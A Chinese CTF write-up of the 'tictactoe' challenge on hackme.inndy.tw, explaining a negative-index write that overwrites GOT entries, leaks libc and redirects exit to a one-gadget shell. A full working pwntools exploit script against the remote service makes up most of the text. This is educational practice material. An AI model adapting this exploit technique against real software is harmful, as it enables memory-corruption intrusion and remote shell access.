https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了tictactoe这个题目感觉还不错,我把wp分享出来,方便大家学习
tictactoe的题目要求是:

nc hackme.inndy.tw 7714

Can you beat my tic-tac-toe AI?

把tictactoe直接拖入ida中:
main函数:

computerMove函数:

draw函数:

playerMove函数:

win函数:

print_result函数:

input函数:

这个题目挺复杂的,但是在反编译的地方我找到一个题目的源码在:https://gist.github.com/MatthewSteel/3158579,这个题目就是由这个游戏修改而成
先运行一下程序看一下这个程序干了啥:

这个程序输入9的时候可以输入改变的数字,输入其他数字可以把输入的数字放入指定的位置
再看看程序开启了哪些保护:

这个题目开了栈不可执行和canary保护,所以不可能是栈溢出
这个程序的漏洞点是在:playerMove函数里面,由于输入的数字没有任何限制,所以可以输入负数覆盖0x804B056之前的数字,在地址0x804B056之前由got表,所以可以修改got表中的内容来改变程序的流程,但是这个程序如果改变got表中的内容的话就只有三次机会,每次只能修改一个字节,然后就会判断你失败,最后强行退出程序,由于Linux动态运行库会延迟绑定,这个可以参考 http://blog.csdn.net/virtual_func/article/details/48789947 下面是getshell的过程:
(1)通过两次修改把memset@got的后两位地址改成0x08048BD5,也就是反编译中的main函数的第37行调用playerMove函数的地址,这样就使整个程序变成一个循环
(2)利用循环修改open函数为:printf("Here is your flag: %s\n", buf);的地址,也就是0x08048CB4这个位置,目的是为了泄露libc的基地址
(3)利用循环把exit函数改成main函数的第37行调用playerMove函数的地址,目的是为了在泄露libc基地址后,再计算MAGIC,之后跳转到大循环中
(4)上面的open函数和exit函数修改完成之后,只要把0x804B04D中数据改成ff ff ff,就可以赢得游戏,程序就会运行到读flag的地方,也就可以运行你布置好的流程,通过这个循环获取到MAGIC地址后再跳到main函数的第37行调用playerMove函数的地址
(5)通过playerMove函数修改0x804B04D中数据改成ff 01 ff 使win判断失败,继续进入到大循环中
(6)再大循环中把open@got指针改成exit(0);的地址,也就是0x08048CF2,把exit@got改成MAGIC的地址
(7)把0x804B04D中数据改成ff ff ff,再次赢得游戏,就可以getshell了
下面是我的exp

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'niexinming'

from pwn import *
import sys
from termios import tcflush, TCIFLUSH

context(terminal = ['gnome-terminal', '-x', 'sh', '-c'], arch = 'i386', os = 'linux', log_level = 'debug')

localMAGIC = 0x3AC69      #locallibc
remoteMAGIC = 0x3ac49      #remotelibc   #libc6_2.23-0ubuntu3_i386.so

def debug(addr = '0x08048CF2'):
    raw_input('debug:')
    gdb.attach(io, "b *" + addr)

def base_addr(prog_addr,offset):
    return eval(prog_addr)-offset

def input_number(number):
    io.recv(timeout=5)
    io.sendline('9')
    #tcflush(sys.stdin, TCIFLUSH)
    io.send(number)
    time.sleep(1)
    sys.stdout.flush()
    #tcflush(sys.stdin, TCIFLUSH)
def input_addr(addr):
    io.recvuntil('Input move (9 to change flavor): ',timeout=5)
    io.sendline(addr)
    sys.stdout.flush()
    #time.sleep(1)
    #tcflush(sys.stdin, TCIFLUSH)


elf = ELF('/home/h11p/hackme/tictactoe')


#io = process('/home/h11p/hackme/tictactoe')
io = remote('hackme.inndy.tw', 7714)
#debug()
io.recvuntil('Play (1)st or (2)nd? ')
io.sendline('1')
#change memset to loop
input_number(p32(0xd5))
input_addr('-34')
input_number(p32(0x8b))
input_addr('-33')


#change open to printf_flag
input_number(p32(0xb4))
input_addr('-42')
input_number(p32(0x8c))
input_addr('-41')
input_number(p32(0x04))
input_addr('-40')
input_number(p32(0x08))
input_addr('-39')


#change exit to loop
input_number(p32(0xd5))
input_addr('-46')
input_number(p32(0x8b))
input_addr('-45')
input_number(p32(0x04))
input_addr('-44')
input_number(p32(0x08))
input_addr('-43')


#success get flag
input_number(p32(0xff))
input_addr('-9')
input_number(p32(0xff))
input_addr('-8')
input_number(p32(0xff))
input_addr('-7')

#leak libc_base
libc_leak=io.recv(timeout=5).splitlines()[1][19:23]
libc_leak=u32(libc_leak)
print hex(libc_leak)
libc_base=libc_leak-0x3f12
print "libc_base:"+hex(libc_base)

#MAGIC_addr=libc_base+localMAGIC
MAGIC_addr=libc_base+remoteMAGIC
print "MAGIC_addr:"+hex(MAGIC_addr)

#unsuccess get flag
input_number(p32(1))
input_addr('-8')


#change open to exit
input_number(p32(0xce))
input_addr('-42')
input_number(p32(0x8c))
input_addr('-41')
input_number(p32(0x04))
input_addr('-40')
input_number(p32(0x08))
input_addr('-39')

#change exit to MAGIC_addr
Bytes_MAGIC_addr=bytearray.fromhex(hex(MAGIC_addr)[2:])
exit_addr=-46
for i in Bytes_MAGIC_addr[::-1]:
    input_number(p32(i))
    input_addr(str(exit_addr))
    exit_addr=exit_addr+1


#success get flag
input_number(p32(0xff))
input_addr('-8')


io.interactive()
#io.recv()

效果是:

Ps:打远程会经常断,要试几次

tictactoe.zip (0.003 MB) 下载附件
点击收藏 | 0 关注 | 0
  • 动动手指,沙发就是你的了!
登录 后跟帖